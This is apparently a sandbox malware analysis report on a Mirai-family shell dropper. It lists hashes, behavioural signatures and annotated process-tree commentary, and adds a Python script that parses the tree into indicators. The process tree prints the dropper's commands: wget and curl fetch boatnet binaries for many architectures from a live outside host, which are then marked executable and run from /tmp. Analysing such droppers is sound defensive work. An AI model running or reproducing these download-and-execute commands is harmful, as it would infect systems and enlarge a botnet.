Analysis
-
max time kernel
149s -
max time network
80s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system -
submitted
11/03/2025, 08:32
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
37b42f54fe3c72cb1eb5543a6c17f546
-
SHA1
637b619c1d425218ed7ec1ae064fc85196423c45
-
SHA256
ab63171a0b3118f9a223b6f0cf23303cdd2aafcbdff1e8024e9728a91f99ae8d
-
SHA512
e201190305d13d12894dfe7c8cd9f0c5022ebbd3af2d573f64433f676c1b22131f1abecc9f85bce3b453de6661a10291595318d15f025465360fa52c78089f8a
Malware Config
Extracted (two identical extractions)
Family
mirai
Botnet
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
726  chmod
733  chmod
739  chmod
751  chmod
771  chmod
797  chmod
807  chmod
815  chmod
829  chmod
851  chmod
863  chmod
869  chmod
875  chmod
881  chmod
887  chmod
Executes dropped EXE 15 IoCs
ioc       pid  Process
/tmp/WTF  727  ohshit.sh
/tmp/WTF  734  ohshit.sh
/tmp/WTF  740  ohshit.sh
/tmp/WTF  753  ohshit.sh
/tmp/WTF  772  ohshit.sh
/tmp/WTF  798  ohshit.sh
/tmp/WTF  808  ohshit.sh
/tmp/WTF  816  ohshit.sh
/tmp/WTF  831  ohshit.sh
/tmp/WTF  852  ohshit.sh
/tmp/WTF  864  ohshit.sh
/tmp/WTF  870  ohshit.sh
/tmp/WTF  876  ohshit.sh
/tmp/WTF  882  ohshit.sh
/tmp/WTF  888  ohshit.sh
The script overwrites /tmp/WTF with each architecture build in turn and runs it again, so one path is executed fifteen times. Only the instance started after boatnet.mpsl was copied in (PID 808) shows any further behaviour in the process tree; this task ran on a mipsel sandbox, so the other fourteen copies were builds for foreign architectures.
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description                   ioc                 Process
File opened for modification  /dev/watchdog       WTF
File opened for modification  /dev/misc/watchdog  WTF
Writes file to system bin folder 2 IoCs
description                   ioc             Process
File opened for modification  /sbin/watchdog  WTF
File opened for modification  /bin/watchdog   WTF
The two /sbin and /bin opens follow the same open-for-modification pattern as the /dev paths and come from the same process, so the likelier reading (an inference, the binary was not analysed here) is that the bot walks a list of alternative watchdog device paths rather than dropping anything into the system bin directories. Triage it as watchdog tampering, not as a file drop.
UPX-packed file (yara rule: upx) 2 IoCs
resource                          yara_rule
behavioral4/files/fstream-1.dat   upx
behavioral4/files/fstream-4.dat   upx
Reads runtime system information 54 IoCs
Reads data from the /proc virtual filesystem.
description              ioc                            Process  count
File opened for reading  /proc/<pid>/cmdline            WTF      39
                         pids: 465, 479, 511, 512, 675, 693, 694, 695, 696, 697, 786, 790, 802, 811, 813, 818, 819, 823, 824, 827, 829, 830, 834, 836, 841, 843, 849, 856, 860, 861, 866, 867, 872, 873, 878, 879, 880, 884, 885
File opened for reading  /proc/sys/crypto/fips_enabled  curl     15
Two unrelated things are mixed in this signature. The cmdline reads come from the running bot (WTF, PID 808) walking every process it can see, including processes spawned after it (PIDs up to 885); this is the sweep Mirai's killer routine uses to find and terminate competing bots, and it is the part worth detecting. The fips_enabled reads are one per curl invocation (fifteen curl processes appear in the tree) and are a crypto-library FIPS-mode probe performed at start-up, not sample behaviour; do not build a detection on them.
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid  Process
729  wget
731  curl
732  cat
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description: File opened for modification (all rows)
ioc                  Process
/tmp/WTF             ohshit.sh
/tmp/boatnet.arc     curl
/tmp/boatnet.arm     wget, curl
/tmp/boatnet.arm5    wget, curl
/tmp/boatnet.arm6    wget, curl
/tmp/boatnet.arm7    wget, curl
/tmp/boatnet.i468    curl
/tmp/boatnet.i686    curl
/tmp/boatnet.m68k    wget, curl
/tmp/boatnet.mips    wget, curl
/tmp/boatnet.mpsl    wget, curl
/tmp/boatnet.ppc     wget, curl
/tmp/boatnet.sh4     wget, curl
/tmp/boatnet.spc     wget, curl
/tmp/boatnet.x86     wget, curl
/tmp/boatnet.x86_64  curl
Processes
-
Process tree (image, command line, PID; processes spawned by the script are indented beneath it). Each round fetches one architecture build of boatnet with wget and again with curl -O, passes it through cat into WTF (the shell, not cat, is what opens /tmp/WTF for writing, consistent with a redirect such as cat boatnet.x86 > WTF), marks everything in /tmp executable and runs ./WTF. The argument list of chmod grows by one file per round and includes the sandbox's own systemd-private-... directory until that directory disappears in the x86_64 round, which points to a wildcard chmod +x * in /tmp rather than an explicit file list. Both readings are inferences from the tree; the script body itself is not shown in this report.

/tmp/ohshit.sh  /tmp/ohshit.sh  PID 696
  - Executes dropped EXE
  - Writes file to tmp directory
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.x86  PID 702
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.x86  PID 717
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.x86  PID 725
    /bin/chmod  chmod +x boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF  PID 726
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 727
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.mips  PID 729
      - System Network Configuration Discovery
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.mips  PID 731
      - Reads runtime system information
      - System Network Configuration Discovery
      - Writes file to tmp directory
    /bin/cat  cat boatnet.mips  PID 732
      - System Network Configuration Discovery
    /bin/chmod  chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF  PID 733
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 734
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.arc  PID 736
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.arc  PID 737
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.arc  PID 738
    /bin/chmod  chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF  PID 739
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 740
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.i468  PID 741
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.i468  PID 742
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.i468  PID 750
    /bin/chmod  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF  PID 751
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 753
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.i686  PID 755
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.i686  PID 761
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.i686  PID 770
    /bin/chmod  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-c64f833f9b554514afef46d79950adb2-systemd-timedated.service-74oe8r WTF  PID 771
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 772
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.x86_64  PID 775
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.x86_64  PID 783
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.x86_64  PID 795
    /bin/chmod  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 797
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 798
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.mpsl  PID 800
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.mpsl  PID 805
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.mpsl  PID 806
    /bin/chmod  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 807
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 808
      - Modifies Watchdog functionality
      - Writes file to system bin folder
      - Reads runtime system information
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.arm  PID 812
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.arm  PID 813
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.arm  PID 814
    /bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 815
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 816
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.arm5  PID 818
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.arm5  PID 819
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.arm5  PID 828
    /bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 829
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 831
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.arm6  PID 834
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.arm6  PID 841
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.arm6  PID 850
    /bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 851
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 852
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.arm7  PID 856
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.arm7  PID 861
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.arm7  PID 862
    /bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 863
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 864
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.ppc  PID 866
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.ppc  PID 867
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.ppc  PID 868
    /bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 869
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 870
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.spc  PID 872
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.spc  PID 873
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.spc  PID 874
    /bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 875
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 876
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.m68k  PID 878
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.m68k  PID 879
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.m68k  PID 880
    /bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 881
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 882
    /usr/bin/wget  wget http://107.172.82.193/hiddenbin/boatnet.sh4  PID 884
      - Writes file to tmp directory
    /usr/bin/curl  curl -O http://107.172.82.193/hiddenbin/boatnet.sh4  PID 885
      - Reads runtime system information
      - Writes file to tmp directory
    /bin/cat  cat boatnet.sh4  PID 886
    /bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF  PID 887
      - File and Directory Permissions Modification
    /tmp/WTF  ./WTF  PID 888
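Turning a process list like this into IoCs by hand is error-prone because the page fuses each image path onto its command line and glues the tree depth to the last argument (boatnet.x862⤵ is boatnet.x86 at depth 2). The Python below is an added example, not tria.ge tooling: it parses an excerpt transcribed from the tree above (constructed sample input, root plus the x86 and mips rounds only), recovers image, command line, PID and tags for each process, extracts the download host, URLs and payload names, and flags every fetch, chmod +x, execute-from-/tmp round. The splitting rule (the command's first token shares its basename with the image) is an assumption about the page layout, not a documented format.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed excerpt of the report's process list, page layout preserved.
SAMPLE = """\
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:696
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:702
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:717
/bin/catcat boatnet.x862⤵PID:725
/bin/chmodchmod +x boatnet.x86 ohshit.sh WTF2⤵
- File and Directory Permissions Modification
PID:726
/tmp/WTF./WTF2⤵PID:727
/usr/bin/wgetwget http://107.172.82.193/hiddenbin/boatnet.mips2⤵PID:729
/usr/bin/curlcurl -O http://107.172.82.193/hiddenbin/boatnet.mips2⤵PID:731
/bin/catcat boatnet.mips2⤵PID:732
/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh WTF2⤵PID:733
/tmp/WTF./WTF2⤵PID:734
"""

# A process line ends in one depth digit glued to the arrow, optionally followed
# by PID:<n>; tags and the PID may also arrive on the lines after it.
ENTRY = re.compile(r"^(?P<body>.+?)(?P<depth>\d)⤵(?:PID:(?P<pid>\d+))?$")
URL = re.compile(r"https?://\S+")


@dataclass
class Proc:
    image: str
    cmdline: str
    depth: int
    pid: Optional[int] = None
    tags: List[str] = field(default_factory=list)


def split_image(body: str) -> Tuple[str, str]:
    """Undo the fused '<image><command>' layout (assumed rule: the command's first
    token has the image's basename, e.g. '/usr/bin/wget'+'wget ...', '/tmp/WTF'+'./WTF')."""
    for i in range(1, len(body)):
        image, rest = body[:i], body[i:]
        base = image.rsplit("/", 1)[-1]
        parts = rest.split(None, 1)
        if base and parts and parts[0].rsplit("/", 1)[-1] == base:
            return image, rest
    raise ValueError(f"cannot split image from command: {body!r}")


def parse(text: str) -> List[Proc]:
    """Return the processes in page order with their tags and PIDs attached."""
    procs: List[Proc] = []
    for raw in text.splitlines():
        line = raw.strip()
        m = ENTRY.match(line)
        if m:
            image, cmd = split_image(m["body"])
            pid = int(m["pid"]) if m["pid"] else None
            procs.append(Proc(image, cmd, int(m["depth"]), pid))
        elif line.startswith("PID:") and procs:
            procs[-1].pid = int(line[4:])
        elif line.startswith("- ") and procs:
            procs[-1].tags.append(line[2:])
    return procs


def extract_iocs(procs: List[Proc]) -> dict:
    """Network IoCs: every URL on a command line, the hosts, and the payload names."""
    urls = sorted({u for p in procs for u in URL.findall(p.cmdline)})
    return {
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "urls": urls,
        "payloads": sorted({u.rsplit("/", 1)[-1] for u in urls}),
    }


def dropper_rounds(procs: List[Proc]) -> List[Tuple[Optional[int], str]]:
    """Flag each fetch -> chmod +x -> execute-from-/tmp round (the per-architecture
    loop of this dropper). Returns (pid of the /tmp binary, payload fetched before it)."""
    rounds, payload, armed = [], None, False
    for p in procs:
        if p.image.endswith(("/wget", "/curl")):
            m = URL.search(p.cmdline)
            if m:
                payload = m.group(0).rsplit("/", 1)[-1]
        elif p.image.endswith("/chmod") and "+x" in p.cmdline.split():
            armed = True
        elif p.image.startswith("/tmp/") and p.depth > 1 and payload and armed:
            rounds.append((p.pid, payload))
            armed = False
    return rounds
```

parse(SAMPLE) yields eleven processes; extract_iocs on them returns the single host 107.172.82.193 with two URLs and two payload names, and dropper_rounds returns the two executed WTF processes (PIDs 727 and 734) paired with the payload each one followed. Pasting the complete tree into SAMPLE gives all fifteen rounds and the full boatnet file list.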
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
23KB
MD5
6e0d03239183153de8b328368eec14c0
SHA1
d4436c25ca650862b1d626bc735d621720c850c3
SHA256
c28c0adf305d4225c9d21fa9c254519a07e24d4411b42b99c85d882be65a0d1b
SHA512
e96bfb589fa14c9b373d12765b52d17d8f505ee2e55d26bae4067a0d738d89e4e5490927060f8331569c7df4943719fb12e4c36b464eb3c9496abdd8da80edcd
-
Filesize
162B
MD5
1b7c22a214949975556626d7217e9a39
SHA1
d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256
340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512
ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5
-
Filesize
57KB
MD5
d55ad7ddc6b166522c3225839df619c3
SHA1
bb4c61e25abce482514e76907840605cf1abbbf8
SHA256
6c73b9ee290ffc3d5671821ea05d67ca012b3617a432107dbfe8fab0f1b6d7c7
SHA512
94508665c042fae60ce9e21b262f120c7f5b19a92e55c497408c0d71f4a51718315465070bffec2e9293a73b99734a3c7bdbbedce33d80a8cca667e939170916
-
Filesize
20KB
MD5
681dd964889eddd4cfdc230ba745767b
SHA1
bdb24c1844bc8285e2bf781613149f6db7b4928d
SHA256
fca185b5efc7e5df44003d8612f179414eadb71c31386c707a7e6f1f8809790e
SHA512
ac2556dd6bf5c1fde0c0eea5c78037274065cbb5231969d572c8df8dafe3740c49d2c681d21e3abc0f786f1c617162af4c955543f28fe1462dbd196565c655a4